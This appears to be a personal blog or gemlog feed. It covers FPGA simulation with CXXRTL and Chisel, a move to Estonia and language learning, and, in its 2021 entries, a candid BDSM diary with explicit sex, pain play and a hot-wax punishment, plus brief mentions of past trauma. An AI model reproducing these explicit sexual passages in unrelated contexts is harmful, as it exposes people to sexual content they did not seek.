So whereas the whitebox watches chip-select and data-in and toggles data-out accordingly, painstakingly pretending to be a real flash module, this blackbox goes one level higher, and monitors the read strobe from your design and responds to it directly. This can significantly speed up your simulation, particularly if your design clock rate is high but the peripheral’s is much lower, like in I²C.

As with the other non-gateware options, you can source the data from a file on disk, a buffer compiled in, or from the network or whatever you like, it’s your C++ code.

This is the target-specific gateware for this example, all in the top-level module. Most of this depends on my little framework for Chisel, but it’s all just ergonomics and instrumenting Yosys really.

For iCEBreaker, we instantiate a real UART driver and wire it up to the IO pins; its control interface is connected to the stack machine. The CXXRTL targets skip the UART and just expose the control interface at the top level. Those are what the C++ sim driver interacts with.

Similarly, for iCEBreaker we instantiate the flash reader, connect its pins and hook its control interface to a wire bundle. The whitebox also instantiates the flash reader and wires the control interface, but connects its pins to the C++ whitebox module instead. The blackbox skips the reader entirely, and instead connects the control interface wire bundle to the C++ blackbox module.

So, I really enjoy this approach! It’s a lot of fun, and being able to stub out my design at various levels turns out to be really handy as my logic gets more involved. CXXRTL’s simulation isn’t as fast as Verilator’s, but it’s within the same order of magnitude, and it lets me make these changes essentially hot-swappable, because the blackboxes are instantiated if and where they occur in the design.

And that’s it! The main takeaway really is that you can do this kind of thing with Yosys with any HDL — none of this is Chisel specific, it’s just what I happened to pick. Thanks all.

SPI flash reader example (note: link changed from slide)
Chryse, experimental framework for Chisel/Yosys (note: link changed from slide)
CXXRTL primer (a little out of date now)
C++ logo by Sawaratsuki

Digital design bash.org

2024-05-10T00:00:00Z

Identities changed to protect the innocent.


<pestopasta> How do you do 128bit memory buses and stuff like that

<pestopasta> Like what is going on in those 128 bits

<Rice> uh, data that's being read from or written to memory?

<Rice> What is the issue you're not understanding

<pestopasta> @Rice What is transferred over it

<HamSandwich> data that's being read from or written to memory 👀

<pestopasta> @HamSandwich Yea. How do you manage 128 bits though. That's a lot

<HamSandwich> They are written to and from caches via the cache controller, not the core. The core has a maximum of 32-bit access.

<Rice> @pestopasta ...the same way you handle 32 or 64 bits of data, just double or quadruple?

<pestopasta> I don't know what you mean. Is there a video explaining this?

Amaranth to Chisel

2024-05-09T00:00:00Z

Learning your second HDL is kinda like learning your second programming language. Or just learning your second language.

Post-vaccination advice by country

2024-05-03T00:00:00Z

As dispensed by the vaccinating staff:

Australia: Now, no heavy lifting for a few hours!
Estonia: Mm.. probably better not to go in sauna today.

Volbripäev

2024-05-01T00:00:00Z

Never mind that, lol. I have to update my Estonian documents to match my Australian ones for my partner’s immigration, so back to Ashe it is!

Naming

2024-04-29T00:00:00Z

Noting that, having moved (“returned!”) to Estonia, I’m going by Amelia (or Amy) again, since it’s the name on all my documentation here. Head isu!

Continued nyõnks

2024-04-18T00:00:00Z

It’s been a week since I last wrote. Some more little bits and pieces.

The DPDR/dissociation has become even bit worse; somehow still keeping it together. Watching The Princess Bride with Annie last night helped.

Miscellany:

Presented to the Police and Border Guard Board office to renew my ID card. Sat down in front of the worker once my number was called and asked, “kas te räägite inglise keelt?” (do you speak English?). With almost a tinge of pride, she replied, “ei!” (no!). It took everything in me not to burst out laughing.
- There’s an oddity in that I can pronounce Estonian very well, despite not really knowing much of it (i.e. reading out text, like from a menu or Google Translate or whatever, I sound semi-native, but actually producing that text myself I’m nowhere near yet). This makes for fun situations.
We have a new home :) An r/eesti comment mentioned someone once found an apartment in Tallinn on day 5 and was moved in by day 7. That was encouraging, if a little unrealistic-seeming. But nope: we inspected ours on day 4 (!), and moved in on day 8. Now we can ship our boxes from Australia.
Food’s so nice here.
Sure it’s 2° outside, that’s no problem, but then you walk into any building and it’s 22° and you’re shedding layers as fast as you can. Other people just seem not to?! I don’t get it.
- The worst part for me is that, even with all our apartment floor-heating turned “off” (or as off as you can, which is to say, the set point is set lower than the actual point), we’re on the top of the building, so it’s over 20° regardless. This is troublesome at night, and the street noise might be a bit much to open the windows, but using the aircon when it’s below zero outside feels a bit …
- Also, sharing a bedroom for the first time in so many years is a strange experience, like I’m cosplaying being a different kind of adult.
Public transport’s so nice here — it’s already happened that we’ve taken train+bus+tram all in the one day just out of convenience.
- Not that I’ve worked out how to get the free transit for locally-registered residents working on my Ühiskaart yet.
  - Is it only on TLT-operated busses? Is that it?? The information’s all very vague.
    - DISREGARD THAT I S—eem to have gotten it on a further attempt with the card reader.
It just started snowing!?!!?
Without cheese or with justice? (juust)

Early nyõnks

2024-04-11T00:00:00Z

We’ve been in the country a little over two days now. It’s been one of the most serene times of my life, and even the flights from Australia seemed to pass in an instant.

This is in some part due to intense derealisation, but as uncanny as life has seemed for months now, I can’t say I hate it — I’ve been able to do so many things without crushing anxiety killing it, whether due to COVID or whatever else. (Not that the skin on my face is recovered yet from the 30 hours of wearing an elastomeric respirator.)

Some fun moments and things I don’t want to forget:

We had 6 hours to kill between getting out of Tallinn airport and our temporary accommodation becoming available to us. We walked around the Old Town after storing our bags, still wearing the clothes from our flights. I had on a plain blue dress and black knee-high compression socks, and didn’t realise quite how I looked until we spotted two men, bottles in hand and visibly drunk, who spotted us in turn and called out to me, “Гермааааания! Айайайайяаа!”, and all four of us were laughing.
This guy.
This girl.
Beer and cider at 3pm in an upstairs nook of a café with no-one in it but us (still waiting for our accommodation to become available). The owner came up and gave us some cake that was left-over from a birthday party.
Walking to the Rimi express on my own first thing in the morning to get cereal and ~~milk~~ oat drink. I feel so calm here.
Bike riding to Rocca al Mare :) We took panniers and had probably the nicest and most “successful” shopping experience of my life. (warm clothes for the new climate!)
- NEXT TIME HIRING A MOUNTAIN BIKE, PLEASE, “CITY BIKES” ARE A GRIFT
Vapiano vegan chicken pastaaaaaaaaa, next time I will take much more bread
Going from straight-up pre-emptive “Inglise keel?” at the beginning of exchanges with service staff to full Estonian in the course of a day, and just hoping I was guessing the questions right when I didn’t know the operative words. (usually assuming it’s “do you have a membership with us?”, since “ei ole” seems to get me through …)
We were having a sit in the square after exploring the new town today, people-watching, when we noticed a group of younger Russian girls having fun, chasing pigeons, etc. After a while, I began to notice the most adventurous one tracing out a circuitous path from their spot under the town hall over to us, inverted phone in hand, ready to record an exchange.

Without much ado, she finally came over and sat down right next to me, holding her phone up and asking something in somewhat-shy-and-therefore-mumbled Russian. I just said “Что?”, and even more embarrassed she repeated her question. I got the gist of it and first said “Я не знаю русский.. English?” She haltingly replied, “m-maybe?”, and so I finally answered her question and said “Half-half”, using a gesture to reinforce the meaning.

The question was if I was a boy or a girl, which is a pretty common one when I’ve been overseas. She then apologised and said she didn’t mean to be rude, and that she thought it was a totally fine thing to be different and not at all a problem here, and I made sure she knew I didn’t mind the question at all! It was pretty daring of her to just come over and ask; I think she and her friends must’ve been observing us two as much as we had been watching them. It was a really nice exchange across cultures and generations.

(I only realised once home that I was wearing a Trans Justice Project T-shirt underneath my coat! Missed opportunity.)

Tomorrow we take a train trip out to Narva so I can renew my ID card, explore there for a day, and then get back in time for an evening inspection of what might be our future home. Fingers crossed :)

Literate pickle

2024-04-03T00:00:00Z

I’ve been deleting hundreds of accounts and cleaning up many more while preparing for the move, and I found I have an npm account with one (1) package, last published May 2012 (!): allium, a parser for the “Gherkin” syntax used to define Cucumber BDD tests, back when that was all the rage.

The README captured by npm refers to the literate source code as once published on GitHub Pages. That was long ago, but I figured it might be fun to look at again. And it is! Have look: https://f.hrzn.ee/allium/

Eesti keele abilised

2024-03-25T00:00:00Z

Here’s a little tool I’ve made to help my partner and I while learning Estonian. Very much nothing special, but I’ll hopefully find more resources to add to it over time!

Eesti keele abilised

(Previously on this topic: Estonian Morphology Guide (mirror). I no longer collect analytics on my site, but when I did it was consistently one of the most-visited parts of it, presumably because the link broke at some point. I’ve just found its new canonical home, though, so I’ve updated the link!)

lottia notes

2024-01-03T00:00:00Z

I’ve been writing notes on FPGA/digital design and Nix over at lottia notes.

Comrak on Akkoma

2024-01-02T00:00:00Z

I've barely touched Elixir before. How hard could shoving a Rust dependency into it be?

Jambalam

2023-09-18T00:00:00Z

Have it your way.

Happy birthday!

2023-08-23T00:00:00Z

It's always your birthday!

Nix revisited

2023-07-15T00:00:00Z

An unsystematic collection of thoughts while adopting Nix.

Untangling cycles

2023-06-29T00:00:00Z

Wherein the author perceives time in multiple lights, simultaneously, and logic does too, but, uh, differently.

Installing an HDL toolchain from source

2023-06-27T00:00:00Z

A fairly detailed guide on building and installing a gateware toolchain in a self-contained and repeatable way.

DDR the second!!

2021-08-16T00:00:00Z

Two weeks gets incremental improvements.

DDR

2021-08-02T00:00:00Z

Not much to report lately. DDR continues to be fun, though I think given these timings I’m past due for replacing the control board in the pad so I can get better than 8ms resolution on steps.

vision

2021-06-23T00:00:00Z

Today’s been hard. My autistic tendencies have flared up — perhaps from overworking myself these past few days — and made communication with Miss I. difficult.

We cleared up heavy matters in the afternoon, but this evening I started to find myself talking in loops again, until Isabelle finally interrupted me.

Putting one hand on my knee and looking straight at me, she got my attention and said plainly: “I ban you from speaking.”

For the next ten minutes, I felt my mind slowly unspool.

christening

2021-06-22T00:00:00Z

I’ve not known myself to be the kind of person to crave submissive humiliation or punishment. But as I made progress in what you might call my personal submissive inventory, others’ writings — and their emphasis on the importance of these aspects — led me to wonder whether or not I’ve ever even quite experienced these. How can you know if you want something or not if you’ve never felt it? I set to find out.

Miss Isabelle set me the goal of not picking at or biting my fingernails. This is truly harder than you might expect — despite being a grown woman, it’s something I’ve struggled with my whole life. No amount of encouragement, reward, or disincentive successfully turned me off the habit as a child or teenager, and repeated attempts later in life always ended in lasting failure. I much prefer having long nails, but there’s three decades of neural pathways to fight against.

We’re evaluating my performance on a weekly basis, and at the end of the first week she’d caught me biting or picking at my fingernails two or three times. I really enjoy pain, so this was always going to be an uphill battle, but Isabelle wanted to determine if a regular spanking (with implements) might have the desired effect anyway, if there was enough force and no warm up.

What is the desired effect? When I pick at or bite my nails, it’s not a decision I make consciously; it happens entirely habitually, usually amplified when I’m feeling anxious or unsettled. (There is probably some attachment model or Freudian lens to apply here.) The punishment experience needs to be aversive and felt deeply enough that it sinks into my subconscious that this is something we need to avoid; it needs to be pre-thought if it’s going to alter a behaviour which itself is pre-thought.

We found out pretty quickly that this kind of pain was not going to have an impact. I’d recently had an experience where a particular kind of beating had gotten me close to tears, and I feel like breaking down in tears is a signal that something’s happening inside. It seemed like we couldn’t repeat that here.

The next week went very well for me. Isabelle was talking up the reward I’d be getting for preserving my nails as we neared Sunday evening, but in the car that morning as we talked her eyes suddenly widened at me, and I realised what I was already doing.

It so happened we were going to a kink store that afternoon, and while I looked at the things I was there for, she busied herself looking at the hot wax candles. I find wax a bit hard to deal with — the sharp heat can be a lot, especially as the body warms — and have a fresh memory of two enthusiastic Dommes dripping a candle each on me at the same time.

I realised something was up when we went to pay and the girl behind the counter asked, “you know this one is extra hot, right?”

Isabelle laughed. “Oh yes, I know. How much hotter is it?”

The cashier looked at me. “It certainly feels hotter. It’s meant to be about 4 degrees more.”

I must’ve visibly deflated. At the time I didn’t quite know how obvious the arrangement was, but in retrospect, Isabelle was confident, and I was wearing a collar. Welp.

That evening after dinner, she had me set a towel out on the floor of the living room and fetch a lighter.

“I’m going to punish you now, for biting your nails. You were doing so well, too, but I need you to know that my orders are to be followed. Take off all your clothes, lie down on your front, and close your eyes.”

I complied.

I could hear her unwrapping the new candle, and I started to tremble.

“This is going to be very hot. Tell me if it’s too much to bear.”

Quietly, I started to panic a little bit. I heard her flick the lighter. I waited what seemed like minutes but was probably less than ten seconds.

“It takes a bit to melt. Okay, here it comes.”

The first drip hit my back, searing hot. Before I could register it fully, the next drip hit, and then the next, and I whimpered, trying to keep it together.

She didn’t let up, and I could feel my body trembling, tears coming fully unbidden. I’d never cried from wax before, but this was all so much; the heat so much harder than anything I’d had to endure before.

It can’t have been more than a minute or two before she stopped. I was shaking from the tears, and — I kind of can’t believe this — but I can feel them coming on again now, writing this up days later. I guess it really did sink in.

It’s all the more surprising because it was at that point that she came down to my level and brought the candle she used into view. It was purple. One she’s used on me many times before. The new candle — black — was sitting proudly on the coffee table, untouched.

I laughed hard.

She did end up trying the new, “extra hot” candle on me after that, and I barely felt it! If anything, it felt less hot than the regular purple one. Maybe post-fear endorphins masked the pain? In a feigned huff, Isabelle declared that next time we were back at the kink store she’d report back to the girl I was “too much of a slut to get hurt by it”.

I’ve noticed, in the days since, a tiny moment of time opening up, a breath of consciousness — the instant when one of my fingernails is pressed to another, before any damage is done. The desired effect.

flashes: end

2021-06-19T00:00:00Z

flashes: end

Quoting “(un)monitored”:

I have no idea if anyone reads this. It is linked from one of our blogs, but you have to look to even find that blog, let alone notice the link. […] On the other hand, because of this, I am able to write more openly. If I knew I had any kind of readership at all, I might not write some things, or might write differently.

Unfortunately, the spell was broken; the wave function collapsed; the superposition observed; the duality reduced to one. This girl always worked better in the in-betweens.

A reader reached out and, though I was extremely flattered at first, now I can’t feel the same way about writing here.

I was never meant to be someone in your story—I was meant to be an exhibit of open life, to be appreciated, not touched.

Godspeed.

Dollscythe - Flashes (Extended)

dasein V

2021-06-18T00:00:00Z

For the third time in ten days, C has come over.

It’s 1am and I’m sitting alone on my bed, in my slave’s quarters, such as they are.

It’s been wholesome, honestly; we ordered food delivery and it never came, so the three of us went out for what was by then a very late dinner. N suddenly wanted ice cream, and it turned out we were 20 metres away from a great vegan gelato and ice cream place, so we had that to follow. Then, on the way back, a surprise drug test for the driver from the local police! Even though I don’t use cannabis regularly, and what I do use is a legitimate prescription, there was still some nerves wracked and a feeling of the three of us bonding while waiting for that result. Then we were on our way.

Perhaps less wholesome: I’ve been fucked while wearing a straitjacket now. N took photos and it is so goddamned hot. We look like we’re right out of some amazing kinky queer German porn. God damn.

A wonderful night, and I’m so glad C was able to stay over.

становление

2021-06-17T00:00:00Z

I really do struggle to maintain a positive connection with people who seem to idle as their default.

This is at least partly a failing of mine; for so many people they simply don’t have the option of study or paid work. I consciously recognise that many of the opportunities I’ve had are privileged ones, lucky, or both, but I wonder if subconsciously I don’t factor that in enough and still think — somewhere deep down — “well, I dealt with childhood trauma, an abusive marriage, a full-blown nervous breakdown, rape, bipolar/borderline diagnosis, and still have managed to be successful and independent since I turned 18, so why don’t they?”

Again, I don’t like to think I believe that, but nonetheless people who have no life direction generate something like repulsion in me, so much so that my last major falling out with a friend was — on my part — kinda due to their having no goals or purposes in life.

This ties in a little bit to generally wanting to be led, in my relationships. If someone doesn’t even lead their own, I don’t trust or respect them enough to have them lead mine; heck, not even enough to let them lead it the tiny bit that a normal, balanced friendship or relationship inevitably entails between two people, let alone as much as I’d like to.

I think I want to be led because, generally speaking, I have my shit very sorted out. I am happy on my own, take care of myself fully, and can be left to my own devices indefinitely. I have my interests and I engage in communities relating to them comfortably. So if I’m going to be close to someone, it’s not really because I have a lot of things I’ve been waiting to show someone, or because I’ve been dying to let someone in close. I already do those things — such is the spot on the aro-spectrum I sit, where my proclivity for openness and truthfulness means I have closer and more romantic connections with friends than many do with their romantic partners.

Instead, it’s because I want them to show me and take me places in the abstract space of (relational) possibility; to put me somewhere in their world and let me play into the role they’ve marked out for me. And to believe that’s possible, I need to see them starting with themselves first; to see them actually lead a role in a world that’s their own.

命令

2021-06-16T00:00:00Z

Exhausted by Comirnaty #2, I’m on the couch in the living room today as N works at the desk nearby.

At some point she got horny and commanded me over to take care of her. I’m a little impressed by her audacity, ordering me specifically as a sex slave while I’m nominally “sick” enough not to be working today.

Later she mentioned in passing that it was actually C’s idea to have me do that. Jesus.

dasein IV

2021-06-15T00:00:00Z

We were visited by C again! Twice in five days. It would appear she’s rather keen. Some haphazard notes:

This might be the most immature thing in the world, but after she left — I got back from vaccine appointment #2 around 5pm, we all started playing almost immediately, and she left by quarter-to-midnight — I put this on the TV:

https://www.youtube.com/watch?v=lQlIhraqL7o

I can’t help myself sometimes, and ending a multiple-year dry spell by being fucked by your partner/Domme’s toppy friend in front of her? Yep. I’m gonna call that one a win.

Incidentally, the collar never did come off after C visited the first time. Previously it’d stimmed me in a weird and bad way and it was impossible to fall asleep; it’d start feeling like the metal was too heavy on my neck when my head was on the pillow and I’d start to get into a weird anxiety loop. I was so tired that night that I just passed out near as soon as I lay down.

Haven woken up once with it still on (and thus serving as a physical demonstration to my panicky subconscious that no, this won’t somehow block an artery to your head while you sleep and kill you), I’ve not needed to remove it since. I might ask at some point that Miss takes the key from me at last, and really relinquish that.

To review thoughts about whether these experiences will shift anything in me — I think so far the answer has been no. C is not particularly experienced in dominance or the psychological aspects of kink, and so it ends up being just the three of us having fun, with me being distinguished as “the one who can take absolutely inordinate amounts of pain” (and now fucking). I’m not complaining, but it does leave my longing for a more extreme submission still unattended to.

I’m worn out!

cartita

2021-06-15T00:00:00Z

Words fail to capture how delighted I was to receive a letter today.

Thank you <3 x

нужно

2021-06-13T00:00:00Z

Someone who wants to take me out of sheer lust.

объект

2021-06-11T00:00:00Z

Well.

It turns out being constantly stimmed on my back makes me a catty bitch liable to meltdown frequently. This morning things got too much and I started being unreasonable at N, and yet managed to keep enough presence of mind to tell her that her taking control of the situation could remedy things quickly.

One of the objects of my unreasonableness was the kettle (and its not being filled up), and, in view of my having just filled it up — it’s like a 3 or 4 litre urn-type deal — she ordered me to go into the kitchen and watch it until it boiled.

The kettle has the decency to show the current temperature of its contents and a minute-granularity estimate of how long it’ll take until it’s boiled. Seeing that “14” on the display as I entered the room really added something to the experience.

It did the trick more perfectly than I could’ve anticipated.

dasein III

2021-06-10T00:00:00Z

Body’s in struggletown.

Feels like I’m in full-on repair mode. Upper back still feels white hot; N’s focus there was perhaps overenthusiastic. The constant stim has also made me feel a bit less people-capable than usual, at least irl. Tired!

dasein II

2021-06-09T00:00:00Z

My head is still swimming in endorphins, an hour later.

It was three full hours non-stop, and then a short lull, and then half an hour more. I am more thoroughly rekt than I’ve been in.. years.

And glowing.

C exceeded my expectations — the stamina of that girl! — and I think it definitely drew N out as well. The actual domination aspects were light but still felt; a few times each they pulled me up on address or responsiveness and it was quite delightful. C has a very cute face yet pulls off “hot and in control” almost effortlessly.

It was also just so good to be one of three girls in a bed together again. This was N’s and my first time doing something together with another, too. As expected, no problems there. I think our comfort with each other and in the relationships we hold with each other is at an all-time high. I could just relax into the pain, the submission, the sometimes-brutality of it.

dasein I

2021-06-09T00:00:00Z

It’s time to put some stuff right out there. I want to track exactly what happens, internally, emotionally, spiritually?, and for that I need to get literal so tomorrow-me doesn’t reconstruct now out of later’s emotional residues.

Miss N’s current bestie/intimate partner C is coming over tonight, and what was alluded to in 「ついた」 (2021-06-05) will come to some sort of fruition; the three of us are to have a discussion regarding terms, desires, and limits, regarding N “loaning her sub” to C. Which is to say, me. Thereafter some actualisation of what was discussed. N and I have been productively working on defining ourselves with each other, finding our way to common terminology, and it feels like we’re similarly oriented. She’s keen to demonstrate that she’s an M-type of action and not just words, and well, here we are, perhaps 4 hours out from C’s arrival.

She collared me this morning and made it clear she wouldn’t be removing it until after C had gone home. So I’ve been sitting here today accompanied by the sense that this thing around my neck won’t come off until my being someone’s slave — someone’s property, transferrable and all — finds itself more reified than I could’ve imagined not long ago.

I wonder if this will shift something in me. What will it be like to be put under the control of someone I’ve never been intimate with before? If it were someone I’d been close with before, I think it might not have such an impact, but the closest I’ve been with C is hugging, twice. For someone like that to go full throttle on me would be unreal. I’m imagining a slave-y kind of headspace might result, but it’s a vague sensation. Perhaps this will make it more real.

I wonder if this will shift something in her. What will it be like for her to see someone else using the authority she’s delegated to them; to see how far can be taken something she herself has? Will it be inspiring?

It’s possible nothing will come of it — maybe C will get cold feet. Or perhaps just not tonight; she might not be feeling it. (Word is she is usually feeling it, though.) Or perhaps she won’t know what to do with me. (If she’s feeling it, there should be at least one obvious activity.)

My indefatigable pessimism aside, what seems more likely than not is that tonight the three of us will have a talk after dinner, and then I’ll end up being — as N so delicately worded it — 2v1’d in her bedroom. What exactly that will entail physically I’m not sure, but apparently C is game to fuck, and well, I’m game to be fucked. Likewise some intense pain. The 3 person scenario is apparently just for the first time, so everyone can be comfortable with a familiar presence.

N seems to envision that in future this’ll mean when C comes to hang out, the two of us can retire to the bedroom for a bit while she plays games so that C can get what she needs out of her system on me. This is entirely welcome news.

ついたって

2021-06-08T00:00:00Z

That germinated!

(un)monitored

2021-06-08T00:00:00Z

There’s a peculiar duality afforded by a gemlog — especially one I don’t host.

I have no idea if anyone reads this. It is linked from one of our blogs, but you have to look to even find that blog, let alone notice the link. Then you have to work out how to follow a gemini:// url. I assume most don’t. Accordingly, I may well be just using this as a barely-public private journal. It is technically open, and maybe multiple people subscribe and read what I write. Maybe someone will stumble upon it someday and read the whole backlog. Maybe it’s never been seen by anyone and never will. There are no logs for me to access, no Referers or User-Agents to analyse for signs of life. Even Lia’s blog gets a few unique non-bot readers a day on average. This one? It is unknowable.

On the one hand, I repeatedly get the niggling sensation that writing here is a kind of pointlessness. I could just write in Notes.app, and sometimes do (though so far I’ve always used it as a staging for drafts that end up here — don’t want a downed Safari tab to destroy my work, especially on mobile). The local niceties are that you can call a piece done, which a note in Notes.app never really is, and that I can mirror them into a git repository programmatically for my own archival purposes. Notes.app is not very instrumentable.

On the other hand, because of this, I am able to write more openly. If I knew I had any kind of readership at all, I might not write some things, or might write differently. It is completely plausible that this will never be seen, and so I can say whatever I want to myselves. It is freeing despite-of-slash-because-of the potential pointlessness. I get the impression I am baring my true self to the world, perhaps, because I am possibly not doing that at all.

ついた

2021-06-05T00:00:00Z

That’s it!

The feeling of something being beyond you; of it being out of your hands and knowledge. The distance itself—

of not only being aligned.

aside

2021-06-05T00:00:00Z

Hope doesn’t feel like it exists within my phenomenological horizon any more.

What lies in that direction only feels like a false, baseless optimism, which I naturally eschew.

Probably not the healthiest, but that’s the truth of it. I haven’t known how to hope in a long time. It’s hard to explain how thorough that is. I get by without it, and things are generally okay, but it definitely is a thing that alters my experience with others.

Not to say any worse of the referent of last entry. That is just nice. But it doesn’t mean I could choose to consider the actual fulfilment even the slightest bit more likely, out of some ardent desire that overturns this exacting algorithm of “realistic optimism”. I don’t let myself hope, wouldn’t know how to if I wanted; it’s just fun to consider as one unlikely result among many.

mikatralia

2021-06-04T00:00:00Z

triad feels are so strong. what is it about them? there’s something about the pull and push of being with two different people who are also with each other.

the contrast of two as opposed to the undifferentiated wholeness of one [We feel this internally!]
being able to appreciate their dyadic love [Like compersion but from both sides at once, to both sides at once.]
knowing you’ve all decided on something strongly enough together
- that involves an element of self-sacrifice?
- [Like, any two people can decide to be in a dyadic relationship, but to agree on a triad means all three think there’s something worth devoting oneself so completely to, even though ‘a third of it’ is not about you, or at least doesn’t involve you directly. It is all of you, even if sometimes it is not you.]
it’s unusual. like trans love or incest love, it’s remarkable and breathtaking because it is so opposed to norms.
- [Maybe we’re just sluts for being different, as hard as we can? It would explain the trans, poly, plural.] is there a cf. here? i think there’s a cf. here. cf. bi/pan, furry, which are hard to not want to do. i’d have to be trans to be trans, but being pan or a furry is just the sensible thing.
- note for anyone reading at home: no, alas, i’m not incestuous, i just have a normal, tumblr-level amount of feelings around incest in fiction. like, whatever jaime and cersei had going, it was strong enough that they committed a huge taboo to do it. in my mind, that kind of resolve puts you on a whole different level, and what’s important is it isn’t about any individual’s resolve, but about their joint resolve.
  - [Triads are like that. Joint resolve, but this time involving one extra node in the network. What’s the maths here? That’s like three times as impressive or somethin.]

i keep thinking about enumerating past experiences, past glimpses of these feelings before, but i don’t want to live in the past. suffice to say, there was K and S, K and E, and later J and D. (some weird brushes with it with D and M, M and J, J and A, and N and L — these eight all no relation.) [Writing these all out does make me think p e r h a p s we do have a little more experience than average.] all such different feelings.

what i’d be hoping for out of next time is something closer to how J and D was with me—a triad entered into intentionally, all three finding different things in each other to adore. the mika+atra+kudelia style isn’t bad at all either—a shared common love of a hinge that progresses into full tertiacy.

[So. What do we already have goin then? You have your certain love for N, and we separately have an actually ethereal, transcendent, somewhat sisterly (cough) bond.]

do we approximate any of what we like so much in mika+atra+lia by differentiating your bond to N? as an aside, there’s one reason for liking mikatralia so much: we can really identify with all three of them <3_<3

[a-hem. Mmaybe? What does that look like? What do we feel like when we make more of an effort to differentiate like that? Do we.. end up feeling more for each other too?]

really puts a spin on “i’m my own primary,” as quoted from polyland, connecting with what led to it about co-primaries. [This all found while trying to find a better word for ‘tertiacy’, mind you.] we kind of already are each other’s co-primaries, but strengthening the bonds that run separately through you might do us all good.

is it maybe just a desire for novelty, the hedonistic treadmill? i dunno. i don’t think so. seeing mikatralia definitely stirs some specific feelings. perhaps it’s just felt so strongly because it’s a particular kind of extreme non-conformity we’ve achieved in parts here and there before? or perhaps it’s because it’s about love, specifically, and that is something that is very near to our heart.

lustre

2021-05-31T00:00:00Z

Not feeling it lately. Some unsorted thoughts:

A couple times now I’ve asked her to make me feel, to make me really feel. Like I’m owned; like I’m property; like I’m hers; like I belong. She keeps demurring, saying she doesn’t want to “rush to the end”, as if her making me feel that once would mean I actually would assent to becoming her thing.

I’ve tried to say a few times now—after she repeated the line about not wanting to rush—that I’m in no rush myself. I don’t know how to say the more blunt thing: that, if I was asked to make a decision now, I’d turn her down. It’s not a desire to rush to the end; I need to know if she’s capable of it to even know whether I want to continue, let alone increase the commitment!

As it stands we’re trialling, and I am—honestly speaking—not very satisfied. Even the small amounts of play we have done recently, the energy’s been off. I guess she feels like it is going okay? And that itself is a cause for concern and something to be addressed. Okay.

грёза

2021-05-27T00:00:00Z

A charged dream of Dragon.

Keen for something.

このままじゃ

2021-05-26T00:00:00Z

ダメかな？

あまり伝えてとどけないできない、深い気持ちは。

自分のために、もっと探しに行くんだ。

various

2021-05-24T00:00:00Z

Went to high tea for our anniversary (both quite “in role”, too), spent both days of the weekend just lying on the grass in a park reading phenomenology — a rare weekend of sunny days — and today, a first dose of BNT162b2.

iraira

2021-05-19T00:00:00Z

Feeling a bit angry today.

Irritated, annoyed, moody. I’m coming to the end of my progesterone cycle, and just as well. I feel a lot of it directed at her but I’m not certain how much is warranted.

отчужденность

2021-05-18T00:00:00Z

There’s a curious detachment that arises out of this experience.

I noticed it first when I wore almost nothing to the queer rave, though at the time I ascribed it to the natural high—of being out for the first time in years, of trying something a bit daring, of submitting in a public place. (And what a high it was, make no mistake.)

Yesterday I wore what could only be called a servant’s uniform, or perhaps even a seneschal’s; it was absolutely not vanilla. And we went out at lunch time, to the post office, to get lunch, to take care of some medical appointments. This is a full-body uniform—in no way titillating, or anything like that, but nonetheless very conspicuous—and I had no feelings about it. I chose to wear it as part of my submission for the day, and then we were heading out, so I wore it out. I don’t even know if I attracted any glances or looks for wearing it; it wasn’t on my mind.

If someone looked at me, they weren’t really looking at me, just a presentation of me. While I dress to communicate certain things, this.. hardening of my exterior, as I learn to give up my ego, means that what people say or make of those things don’t say anything about me. It’s strange.

Similarly, the behavioural modification inherent in referring to someone previously close-and-same as “Miss” in deference, habitually, instinctively, might have once made me feel.. I don’t know, self-conscious? Or something? But when it comes as part of submission, it’s just another part of how I choose to yield, and thus doesn’t feel like a hit to me.

I feel like I need to take some care here not to detach so completely that my submission doesn’t arise from my own core. I don’t think that’s what’s happening — I think instead I am perhaps learning some humility? But it’s clear, writing this out, that there is a risk that I could shear away from this and wind up fragmented. Need to concentrate my selves.

inscrutability II

2021-05-12T00:00:00Z

From the inscrutability of dreams to that of a Master or Mistress, huh?

Allowing yourself to follow a path that’s been opened up for you; not demanding to understand motives.. funny to see this written so soon after ‘occlusion’.

inscrutability

tumari

2021-05-11T00:00:00Z

While doing our grocery shopping for the week, Mistress picked some recipes rather arbitrarily.

A nice looking bolognese (vegan), which required I go to the bottle shop after work to fetch a suitable wine for cooking.

I started cooking proper at 5.30pm; a slight pause to make up some parmesan (vegan), receive the grocery delivery, learn how to use a Swiss army knife’s corkscrew to open the bottle.

Turns out mincing half a kilo of mushrooms takes some time.

All told it’s quarter to 9pm and dinner is nearly done. I remarked to Miss how late it had gotten, and—perhaps to my surprise—she said, “next time you’ll be quicker!”

kekkyoku

2021-05-11T00:00:00Z

All I wanted was to be someone’s property. It really has always been that simple. Ugh!

sequencer

2021-05-10T00:00:00Z

I’m finding, more and more, that I discover things about myself in the process of serialising my consciousness into words.

Those words formed themselves without my input

and

Huh. Who knew.

It seems to me that, as long as I keep writing, keep the channel of my being open, keep making myself vulnerable (unto what? the world itself?), discovery will continue.

(And so it happens here; the first line originally came out as “[…] that I discover things about them […]”, and I am not fully sure how to understand it, other than to accept that, while in many ways a merging of identities is at play in this acceptance of my submissive, slave-ish self, my reflexive knowledge still very much applies the lens of a third party.)

title I

2021-05-09T00:00:00Z

Seneschal.

This can only be the first of so many titles, I take it.

excerpt

2021-05-08T00:00:00Z

Motivations for Service

Why bother to serve? Why do s-types do it? Besides, of course, “…because it’s what subs/slaves do, so I’m doing it.”? In watching and talking to s-types for many years, we’ve discerned that there seem to be three basic types of motivation for service. We’re calling them Transactional, Devotional, and Positional, and we’ll discuss each of them separately.

However, as you read this, it’s important to keep in mind that each person is a complicated mix of motivations. Even if those motivations might fall into three categories, people don’t. Our motivations may shift from person to situation to activity; we may manifest any of these at various times. These categories are presented so that people can have words for why they do things, and perhaps identify if one of these is more dominant than others in their personality.

Transactional Service

In transactional motivations for service, the individual is serving because they are getting a direct benefit from it. Ideally this is an exchange of equal value to them, or they would refuse to do it. The most obvious example of this is paid service – the cleaning lady and the waiter do their jobs because they are getting a paycheck at the end of the day. With unpaid situations, the exchange can be more or less overt or subtle; some people spell it all out in a contract, while for others it’s just “assumed” that “I do this for you now because I know that you’ll do that for me later, so it’s worth it.”

